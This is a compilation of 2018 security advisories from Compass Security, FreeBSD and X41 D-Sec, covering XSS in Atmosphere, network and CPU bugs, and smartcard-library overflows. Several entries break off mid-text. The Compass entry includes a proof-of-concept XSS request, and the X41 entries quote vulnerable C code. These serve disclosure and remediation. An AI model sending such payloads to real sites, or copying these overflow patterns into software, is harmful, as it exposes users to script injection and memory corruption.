# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: Atmosphere [1] # Vendor:Async-IO.org # CSNC ID: CSNC-2018-023 # Subject: Reflected Cross-Site Scripting (XSS) # Risk: High # Effect:Remotely exploitable # Author:Lukasz D. (advisor...@compass-security.com) # Date: 13.08.2018 # # Introduction: - The Atmosphere Framework is the most popular asynchronous application development framework for enterprise Java. The Atmosphere Framework provides the enterprise features required to build massive scalable and real time asynchronous applications using transports like WebSocket, Server Sent Events and traditional Ajax Techniques. [2] Web applications using the Atmosphere Framework were found to be vulnerable to a common security flaw that allows an attacker to execute malicious code in the browser of users that followed a manipulated link to access the application. Exploiting the vulnerability allows the attacker, for instance, to redirect the user to a phishing page or interact with the application on behalf of the user. Affected: - The following Atmosphere versions are vulnerable: - 2.4.0 - 2.4.28 - 2.3.0 - 2.3.9 - 2.2.0 - 2.2.12 - 2.1.0 - 2.1.13 - 2.0.0 - 2.0.11 - 1.0.0 - 1.0.20 Technical Description: -- The JSONP transport method supported by the Atmosphere Framework is vulnerable to a reflected Cross-Site Scripting (XSS) attack. The JSONP callback parameter that will be put into the server's response can contain HTML code. As the response does not specify the content type, it may be treated as an HTML page by browsers. For example, Firefox 52 ESR will execute JavaScript payload reflected in the response in the following proof of concept: Request: GET /chat?X-Atmosphere-Transport=jsonp& jsonpTransport=%3Chtml%3E%3Cbody%20onload=alert(`XSS`)%3E& X-Atmosphere-tracking-id=1& X-Atmosphere-Framework=1& X-atmo-protocol=true HTTP/1.1 Host: [CUT] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Response: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Atmosphere-tracking-id: 1 Expires: -1 Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Date: Mon, 16 Jul 2018 13:37:00 GMT Connection: close Content-Length: 52 ({"message" : "X"}); Workaround / Fix: - It needs to be ensured that all JSONP responses are delivered with the correct HTTP header: "Content-Type: application/javascript; charset=utf-8". Moreover, JSONP callback function should not contain any non-alphanumeric characters. Timeline: - 2018-07-16: Vulnerability discovered 2018-07-18: Initial vendor notification 2018-07-18: Initial vendor response 2018-07-20: Patched version released 2018-08-13: Public disclosure References: --- [1]: https://github.com/Atmosphere [2]: https://async-io.org/
FreeBSD Security Advisory FreeBSD-SA-18:11.hostapd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:11.hostapdSecurity Advisory The FreeBSD Project Topic: Unauthenticated EAPOL-Key Decryption Vulnerability Category: contrib Module: wpa Announced: 2018-08-14 Credits:Mathy Vanhoef of the imec-DistriNet research group of KU Leuven Affects:All supported versions of FreeBSD. Corrected: 2018-08-15 05:03:54 UTC (stable/11, 11.1-STABLE) 2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2) 2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13) 2018-08-15 05:05:02 UTC (stable/10, 10.4-STABLE) 2018-08-15 02:31:10 UTC (releng/10.4, 10.4-RELEASE-p11) CVE Name: CVE-2018-14526 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The wpa_supplicant(8) utility is a client (supplicant) with support for WPA and WPA2 (IEEE 802.11i / RSN). It is suitable for both desktop and laptop computers as well as embedded systems. Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan(4) driver. The wpa_supplicant(8) utility is designed to be a "daemon" program that runs in the background and acts as the backend component controlling the wireless connection. The wpa_supplicant(8) utility supports separate frontend programs and a text-based frontend (wpa_cli(8)) and a GUI (wpa_gui) are included with wpa_supplicant(8). II. Problem Description When using WPA2, EAPOL-Key frames with the Encrypted flag and without the MIC flag set, the data field was decrypted first without verifying the MIC. When the dta field was encrypted using RC4, for example, when negotiating TKIP as a pairwise cipher, the unauthenticated but decrypted data was subsequently processed. This opened wpa_supplicant(8) to abuse by decryption and recovery of sensitive information contained in EAPOL-Key messages. See https://w1.fi/security/2018-1/unauthenticated-eapol-key-decryption.txt for a detailed description of the bug. III. Impact All users of the WPA2 TKIP pairwise cipher are vulnerable to information, for example, the group key. IV. Workaround Remove TKIP as an allowed pairwise cipher in RSN/WPA2 networks in wpa_supplicant.conf(5) by changing 'pairwise=CCMP TKIP' to 'pariwise=CCMP'. This can also be mitigated by removing TKIP as a cipher on the AP. Systems and users who do not use WPA2 TKIP are not affected. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd.patch # fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd.patch.asc # gpg --verify hostapd.patch.asc [FreeBSD 10.4] # fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd-10.patch # fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd-10.patch.asc # gpg --verify hostapd-10.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart the applicable daemons, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r337832 releng/10.4/ r337829 stable/11/r337831 releng/11.1/ r337828 releng/11.2/ r337828 - --
FreeBSD Security Advisory FreeBSD-SA-18:10.ip
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:10.ip Security Advisory The FreeBSD Project Topic: Resource exhaustion in IP fragment reassembly Category: core Module: inet Announced: 2018-08-14 Credits:Juha-Matti Tilli from Aalto University, Department of Communications and Networking and Nokia Bell Labs Affects:All supported versions of FreeBSD. Corrected: 2018-08-14 18:17:05 UTC (stable/11, 11.1-STABLE) 2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2) 2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13) CVE Name: CVE-2018-6923 Special note: Due to source code differences in FreeBSD 10-stable a patch is not yet available for FreeBSD 10.4. This will follow at a later date. For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Internet Protocol (IP) version 4 (IPv4) allows fragmentation of packets which are too big to traverse all the links between two end stations. Any router along the path between two end hosts may fragment packets which are larger than a link's maximum transmission unit (MTU). FreeBSD's implementation of some IPv4 protocols (such as the Transmission Control Protocol [TCP]) perform path MTU discovery to avoid the need for fragmentation. IP version 6 (IPv6) retains the concept of packet fragmentation. It changed the fragmentation operation to require that the originating end-system perform path MTU discovery and fragment packets which are too large for any MTU along the path between two end systems. While all hosts attached to the Internet are required to support fragmentation and reassembly, many hosts will encounter very few legitimate fragmented packets due to the operation of path MTU discovery. II. Problem Description A researcher has notified us of a DoS attack applicable to another operating system. While FreeBSD may not be vulnerable to that exact attack, we have identified several places where inadequate DoS protection could allow an attacker to consume system resources. It is not necessary that the attacker be able to establish two-way communication to carry out these attacks. These attacks impact both IPv4 and IPv6 fragment reassembly. III. Impact In the worst case, an attacker could send a stream of crafted fragments with a low packet rate which would consume a substantial amount of CPU. Other attack vectors allow an attacker to send a stream of crafted fragments which could consume a large amount of CPU or all available mbuf clusters on the system. These attacks could temporarily render a system unreachable through network interfaces or temporarily render a system unresponsive. The effects of the attack should clear within 60 seconds after the attack stops. IV. Workaround Disable fragment reassembly, using these commands: % sysctl net.inet.ip.maxfragpackets=0 % sysctl net.inet6.ip6.maxfrags=0 On systems compiled with VIMAGE, these sysctls will need to be executed for each VNET. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release or security branch (releng) dated after the correction date, and reboot. Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-18:10/ip.patch # fetch https://security.FreeBSD.org/patches/SA-18:10/ip.patch.asc # gpg --verify ip.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - -
FreeBSD Security Advisory FreeBSD-SA-18:09.l1tf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:09.l1tf Security Advisory The FreeBSD Project Topic: L1 Terminal Fault (L1TF) Kernel Information Disclosure Category: core Module: Kernel Announced: 2018-08-14 Affects:All supported versions of FreeBSD. Corrected: 2018-08-14 17:51:12 UTC (stable/11, 11.1-STABLE) 2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2) 2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13) CVE Name: CVE-2018-3620, CVE-2018-3646 Special Note: Speculative execution vulnerability mitigation remains a work in progress. This advisory addresses the issue in FreeBSD 11.1 and later. We expect to update this advisory to include 10.4 at a later time. For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background When a program accesses data in memory via a logical address it is translated to a physical address in RAM by the CPU. Accessing an unmapped logical address results in what is known as a terminal fault. II. Problem Description On certain Intel 64-bit x86 systems there is a period of time during terminal fault handling where the CPU may use speculative execution to try to load data. The CPU may speculatively access the level 1 data cache (L1D). Data which would otherwise be protected may then be determined by using side channel methods. This issue affects bhyve on FreeBSD/amd64 systems. III. Impact An attacker executing user code, or kernel code inside of a virtual machine, may be able to read secret data from the kernel or from another virtual machine. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +30 "Rebooting for security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.2] # fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.2.patch # fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.2.patch.asc # gpg --verify l1tf-11.2.patch.asc [FreeBSD 11.1] # fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.1.patch # fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.1.patch.asc # gpg --verify l1tf-11.1.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details CVE-2018-3620 (L1 Terminal Fault-OS) - FreeBSD reserves the the memory page at physical address 0, so it will not contain secret data. FreeBSD zeros the paging data structures for unmapped addresses, so that speculatively executed L1 Terminal Faults will access only the reserved, unused page. CVE-2018-3646 (L1 Terminal Fault-VMM) - - Patched systems flush the L1 data cache prior to guest entry, so that there is no secret data in cache for a terminal fault (from the the guest) to access. The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/11/r337794 releng/11.1/ r337828 releng/11.2/ r337828 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References More information on L1 Terminal Fault is available at: https://cve.mitre.o
FreeBSD Security Advisory FreeBSD-SA-18:08.tcp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:08.tcpSecurity Advisory The FreeBSD Project Topic: Resource exhaustion in TCP reassembly Category: core Module: inet Announced: 2018-08-06 Credits:Juha-Matti Tilli from Aalto University, Department of Communications and Networking and Nokia Bell Labs Affects:All supported versions of FreeBSD. Corrected: 2018-08-06 18:46:09 UTC (stable/11, 11.1-STABLE) 2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2) 2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13) 2018-08-06 18:47:03 UTC (stable/10, 10.4-STABLE) 2018-08-15 02:31:10 UTC (releng/10.4, 10.4-RELEASE-p11) CVE Name: CVE-2018-6922 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. 0. Revision history v1.0 2018-08-06 Initial release. v1.1 2018-08-14 Fixed documentation date in manual pages. I. Background The Transmission Control Protocol (TCP) of the TCP/IP protocol suite provides a connection-oriented, reliable, sequence-preserving data stream service. To transmit a stream of data, TCP breaks the data stream into segments for transmission through the Internet, and reassembles the segments at the receiving side to recreate the data stream. II. Problem Description One of the data structures that holds TCP segments uses an inefficient algorithm to reassemble the data. This causes the CPU time spent on segment processing to grow linearly with the number of segments in the reassembly queue. III. Impact An attacker who has the ability to send TCP traffic to a victim system can degrade the victim system's network performance and/or consume excessive CPU by exploiting the inefficiency of TCP reassembly handling, with relatively small bandwidth cost. IV. Workaround As a workaround, system administrators should configure their systems to only accept TCP connections from trusted end-stations, if it is possible to do so. For systems which must accept TCP connections from untrusted end-stations, the workaround is to limit the size of each reassembly queue. The capability to do that is added by the patches noted in the "Solution" section below. V. Solution As a temporary solution to this problem, these patches limit the size of each TCP connection's reassembly queue. The value is controlled by a sysctl (net.inet.tcp.reass.maxqueuelen), which sets the maximum number of TCP segments that can be outstanding on a session's reassembly queue. This value defaults to 100. Note that setting this value too low could impact the throughput of TCP connections which experience significant loss or reordering. However, the higher this number is set, the more resources can be consumed on TCP reassembly processing. Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 10.4] # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch.asc # gpg --verify tcp-10.patch.asc [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch.asc # gpg --verify tcp-11.patch.asc [*** v1.1 NOTE ***] Patchsets are provided for completeness, it have little impact to runtime behavior. [FreeBSD 10.4] # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-10.patch # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-10.patch.asc # gpg --verify tcp-man-10.patch.asc [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-11.patch # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-11.patch.asc # gpg --verify tcp-man-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reb
X41 D-Sec GmbH Security Advisory X41-2018-004: Multiple Vulnerabilities in Yubico libykneomgr
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2018-004 Multiple Vulnerabilities in Yubico libykneomgr == Overview - Confirmed Affected Versions: 0.1.9 Confirmed Patched Versions: - Vendor: Yubico / Depreciated Vendor URL: https://www.yubico.com/ Credit: X41 D-Sec GmbH, Eric Sesterhenn Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-004-libykneomgr/ Summary and Impact - -- An out of bounds write and read was discovered when malicious responses from a smartcard are received. These might lead to memory corruptions. We assume that these are not easily exploitable. X41 did not perform a full test or audit on the software. Please note that the library is deprecated for more than a year and no update will be published by the vendor. Product Description - --- This is a C library to interact with the CCID-part of the YubiKey NEO. There is a command line tool "ykneomgr" for interactive use. It supports querying the YubiKey NEO for firmware version, operation mode (OTP/CCID) and serial number. You may also mode switch the device and manage applets (list, delete and install). Out of Bounds Read/Writes = Severity Rating: Medium Vector: APDU Response CVE: CWE: 120 CVSS Score: 7.1 (High) CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H Summary and Impact - -- File lib/backendpcsc.c contains the following code in function `backendappletlist()` {% highlight c %} { sizet i; sizet thislen = recv[length++]; for (i = 0; i < thislen; i++) { if (appletstr) { if (reallen + 2 > *len) { return YKNEOMGRBACKENDERROR; } sprintf (p, "%02x", recv[length]); p += 2; } reallen += 2; length++; } if (appletstr) { if (reallen + 1 > *len) { return YKNEOMGRBACKENDERROR; } *p = '\0'; p++; } reallen++; length += 2; } {% endhighlight %} There is an off-by-one write of a '\x00' when the sprintf() is called, since it terminates the string with a trailing null-byte. Additionally reads are performed based on thislen, which is retrieved from the data without further safety checks. Workarounds - --- It is advised to migrate to YubiKey Manager since the vendor does not support the library anymore and will not issue a patch. Timeline 2018-02-03 Issues found 2018-05-22 Vendor contacted 2018-05-22 Vendor reply 2018-06-05 Requesting technical feedback from the vendor 2018-06-06 Vendor confirms bug, but states that library is depreciated, will not be fixed 2018-08-11 Advisory released - -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 Geschäftsführer: Markus Vervier -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty3PMACgkQo5Klpg50 CxCvvA//RdQkadlV9yD1IFM7+lqkfMYCyeRyjEg19NWY7QL3Y6C0BeMNiMv/q74i TUw3G30X6ehgsaef5VWzpC7IibUC2DbltIZV3tYpNHePvc4GeMAl9dytqAy4MGnM EIxC7RrT4w85EDnaK9NvEXdo2QOlSuzt1MtePYhmoa23wZFH328w1WVhxgAYffna Cu7LCJIgWkh1y5jqc66553g34SRH3jiuVYSwTgIzC2MhVnXrjktbIwgddJLkV5Zr eRktqby13iWZns/oGE4GYjsmryoXaoDfGS5wuro7CNua+JqiEPwsH0bURvJDUxGi MvEEMl5TwoCeTzDqsofLBou1RNLVyI6W19MnYhNC6RCSUuFRXFF3nHqO7vQ5Gpft JS6URDUKWd/reh0Xwy3dlaEaXEIUPEHBcLwd0wmKqVgMTjUrOvgIAED8woS+Rzn9 qI+NbooNGt1OzlXR4RojKjRMJtWcwya8bhlNLk/ZFl/pokAEh6bZ1jcMg/U0NG9Q R4AI2u2NX3lE39ku/dcTQQCJpTTcr0DdGUw6kux0dkJXEhEc6YixgFzrHH1CPS/y 2sYLICX3iWjAtd81CO0PL4QXte2ekh8YWaf/1qV2BusOxwlHQjODO8o3kLueU2DC Uy4ftml35nu+qVS+vYA85N4+4/Fri6UkbjkgbI2fODgE3pImc+A= =dyfA -END PGP SIGNATURE-
X41 D-Sec GmbH Security Advisory X41-2018-005: Multiple Vulnerabilities in Apple smartcardservices
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2018-005 Multiple Vulnerabilities in Apple smartcardservices === Overview - Confirmed Affected Versions: e3eb96a6eff9d02497a51b3c155a10fa5989021f Confirmed Patched Versions: 8eef01a5e218ae78cc358de32213b50a601662de Vendor: Apple Vendor URL: https://smartcardservices.github.io/ Credit: X41 D-Sec GmbH, Eric Sesterhenn Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-005-smartcardservices/ Summary and Impact - -- Attackers with local access can exploit security issues in the smartcard driver. These result in memory corruptions, which might lead to code execution. Since smartcards can be used for authentication, the vulnerabilities may allow an attacker to login to the system without valid credentials as any user. X41 did not perform a full test or audit on the software. Product Description - --- The Smart Card Services project is comprised of several components which, when combined, provide the necessary abstraction layer and integration of smart cards into Apple’s CDSA implementation. Stack based buffer overflow === Severity Rating: Medium Vector: APDU Response CVE: CVE-2018-4300 CWE: 120 CVSS Score: 7.1 (High) CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H Summary and Impact - -- In file Tokend/CAC/CACRecord.cpp the function CACCertificateRecord::getDataAttribute() might overwrite the value certificate and possibly other stack data, if a smartcard provides malicious data. {% highlight c++ %} unsigned char command[] = { 0x80, 0x36, 0x00, 0x00, 0x64 }; unsigned char result[MAXBUFFERSIZE]; sizet resultLength = sizeof(result); uint8 certificate[CACMAXSIZECERT]; uint8 uncompressed[CACMAXSIZECERT]; sizet certificateLength = 0; try { PCSC::Transaction (cacToken); cacToken.select(mApplication); uint32t cacreturn; do { cacreturn = cacToken.exchangeAPDU(command, sizeof(command), result, resultLength); if ((cacreturn & 0xFF00) != 0x6300) CACError::check(cacreturn); sizet requested = command[4]; if (resultLength != requested + 2) PCSC::Error::throwMe(SCARDEPROTOMISMATCH); memcpy(certificate + certificateLength, result, resultLength - 2); certificateLength += resultLength - 2; // Number of bytes to fetch next time around is in the last byte // returned. command[4] = cacreturn & 0xFF; } while ((cacreturn & 0xFF00) == 0x6300); } catch (...) { return NULL; } {% endhighlight %} As long as the smartcard returns a return code of 0x63FF, more data is copied into the certificate buffer, causing a stack based overflow. A malicious smartcard is able to control all of the overflowed bytes. Workarounds - --- None Stack based buffer overflow with limited input == Severity Rating: Medium Vector: APDU Response CVE: CVE-2018-4301 CWE: 120 CVSS Score: 7.1 (High) CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H Summary and Impact - -- In file Tokend/PKCS11/GemaltoKeyHandle.cpp the function GemaltoPrivateKeyRecord::computeDecrypt() might overwrite the value strData if the supplied dataLength is too big. {% highlight c++ %} void GemaltoPrivateKeyRecord::computeDecrypt(GemaltoToken , CKULONG mech, const AccessCredentials *cred, unsigned char *data, sizet dataLength, unsigned char output, size_t ) { GemaltoToken::log("\nGemaltoPrivateKeyRecord::computeDecrypt \n"); GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - mechanism <%lu>\n", mech); GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - cred <%p>\n", cred); char strData[6000]; memset(strData, '\0', sizeof(strData)); char str = strData; for (size_t i=0; i - data <%s>\n", dataLength, strData); GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - output <%p>\n", output); GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - outputLength <%lu>\n", outputLength); {% endhighlight %} The attacker might control the data which is to be decrypted, but exploitation is limited by the sprintf() format string. Workarounds - --- None Timeline 2018-02-03 Issues found 2018-05-22 Vendor contacted 2018-05-22 Automated vendor reply 2018-05-23
X41 D-Sec GmbH Security Advisory X41-2018-003: Multiple Vulnerabilities in pam_pkcs11
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2018-003 Multiple Vulnerabilities in pam_pkcs11 == Overview - Confirmed Affected Versions: 0.6.9 Confirmed Patched Versions: - Vendor: Unmaintained Vendor URL: https://github.com/OpenSC/pampkcs11 Credit: X41 D-Sec GmbH, Eric Sesterhenn Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-003-pampkcs11/ Summary and Impact - -- It is possible to replay an authentication by using a specially prepared smartcard or token in case pam-pkcs11 is compiled with NSS support. Furthermore two minor implementation issues have been identified. X41 did not perform a full test or audit on the software. Product Description - --- This Linux-PAM login module allows a X.509 certificate based user login. The certificate and its dedicated private key are thereby accessed by means of an appropriate PKCS #11 module. For the verification of the users' certificates, locally stored CA certificates as well as either online or locally accessible CRLs are used. Authentication Replay = Severity Rating: High Vector: Login attempt at compromised machine CVE: - CWE: 125 CVSS Score: 7.0 (High) CVSS Vector: CVSS:3.0/AV:P/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N Summary and Impact - -- A replay attack is possible due to a logic bug in file pampkcs11.c. In function `pamsmauthenticate()a nonce is generated and signed with the card to verify that the card holds the matching secret key, if a valid certifiate is found. This is done using the functiongetrandomvalue(), which in turn callsPK11GenerateRandom()`, which queries the smartcard for random data. This allows for a replay attack with a malicious smartcard. If a user plugins in his card into a compromised computer, the nonce and answer can be recorded by an attacker. The attacker then modifies a smartcard or a smartcard emulator to replay with the exact same nonce and signed data, which allows the attacker to login to another computer without having further access to the smartcard. Workarounds - --- Switch to pam_p11. Buffer Overflow === Severity Rating: Low Vector: Overly long user home directory CVE: - CWE: 121 CVSS Score: - CVSS Vector: - Summary and Impact - -- In file opensshmapper.c a stack based buffer overflow is possible if a user has a home directory with a length of more than 512 bytes. This allows to overwrite the passwd structure and possibly the return address in `opensshmappermatchuser()`; {% highlight c %} opensshmapper.c static int opensshmappermatchuser(X509 *x509, const char *user, void *context) { struct passwd *pw; char filename[512]; if (!x509) return -1; if (!user) return -1; pw = getpwnam(user); if (!pw || isemptystr(pw->pwdir) ) { DBG1("User '%s' has no home directory",user); return -1; } sprintf(filename,"%s/.ssh/authorizedkeys",pw->pwdir); return opensshmappermatchkeys(x509,filename); } {% endhighlight %} Workarounds - --- Switch to pam_p11. Memory not cleaned properly before free() = Severity Rating: Low Vector: - CVE: - CWE: 244 CVSS Score: - CVSS Vector: - _ Summary and Impact - -- In several places memory is set to zero using memset() and passed on to free() afterwards. This is a pattern which modern compilers optimize away, which renders the call to memset() useless. This causes sensitive data such as passwords to remain in the memory, which defeats the original intention of the code. {% highlight c %} memset(password, 0, strlen(password)); free(password); {% endhighlight %} Workarounds - --- Switch to pam_p11. Timeline 2018-02-03 Issues found 2018-04-18 Vendor contacted 2018-04-18 Vendor reply 2018-05-18 Technical details provided 2018-05-24 Private git branch created, issues fixed 2018-08-08 Patched version released at https://github.com/x41sec/pam_pkcs11 2018-08-11 Advisory released - -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 Geschäftsführer: Markus Vervier -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty3K4ACgkQo5Klpg50 CxDfHhAAiANUMfz5YSGvQS8HJYcAwiDwL5Z6TRJEKg4RRS94hehzpDCHaVaABsnB 6BtRCx6Jp8hDs9Iz36y+E8txg349OSUyrRSL9RQ6/G7MrLOJ0kOxijkAWbvJg/nD elgsGa65DKWwqHvc5AsRXxWZFtyNs6CTWGyfJJvyC3cpHM0E0jru5xjuwklm1YAG DOcqadZav2FPzKJz5tYsDa42aAWYyjE2MMXzkY7kT3aQ2G70DhN2mJqnnmsmMFcH GZaZO+4SaWq97SNVzzvKXk9m0T8S2HmumAF8g9mGLuCTfBVsbi4DmGyb9mvZOK2S djwBCHf0rRqXP83hszwHD/zQoW796r7tj9PGmKmvRoDeX76aGuLgQoZ55zged9R1 QkPiD89w+7YANMHumsfLXgXRdhxWaObFvtJWtFCd+v0iS5r249zYukJXn89lnY4p 1x3eBPOzYfSvdHBV0d8/l8uiqZGM9mN55Y4AvkOQYc2EZf78Hb7m150
X41 D-Sec GmbH Security Advisory X41-2018-002: Multiple Vulnerabilities in OpenSC
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2018-002 Multiple Vulnerabilities in OpenSC == Overview - Confirmed Affected Versions: 0.18.0 Confirmed Patched Versions: possibly 0.19.0 Vendor: OpenSC Vendor URL: https://github.com/OpenSC/OpenSC Credit: X41 D-Sec GmbH, Eric Sesterhenn Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-002-OpenSC/ Summary and Impact - -- Multiple issues have been identified in OpenSC, ranging from stack based buffer overflows to out of bounds reads and writes on the heap. They can be triggered by malicious smartcards sending malformed responses to APDU commands. Additionally to those fixes reported here, a lot of minor issues (eg. OOB reads and similar) have been reported and fixed. The OpenSC team (especially Frank Morgner) did an excellent job on identifying and fixing further issues. Due to the large amount of issues, no individual issues have been rated with CVSS / CVE ID yet. X41 did not perform a full test or audit on the software, but tried to help identifying as many bugs as possible in over the course of a year. Product Description - --- OpenSC provides a set of libraries and utilities to work with smart cards. Its main focus is on cards that support cryptographic operations, and facilitate their use in security applications such as authentication, mail encryption and digital signatures. OOB Write in musclelistfiles() == In function muscle_list_files() in file src/libopensc/card-muscle.c an out of bounds write might occur, since bufLen is not checked. {% highlight c %} static int musclelistfiles(sccardt card, u8 *buf, sizet bufLen) { muscleprivate_t priv = MUSCLEDATA(card); mscfst fs = priv->fs; int x; int count = 0; mscfscheckcache(priv->fs); for(x = 0; x < fs->cache.size; x++) { u8 oid= fs->cache.array[x].objectId.id; 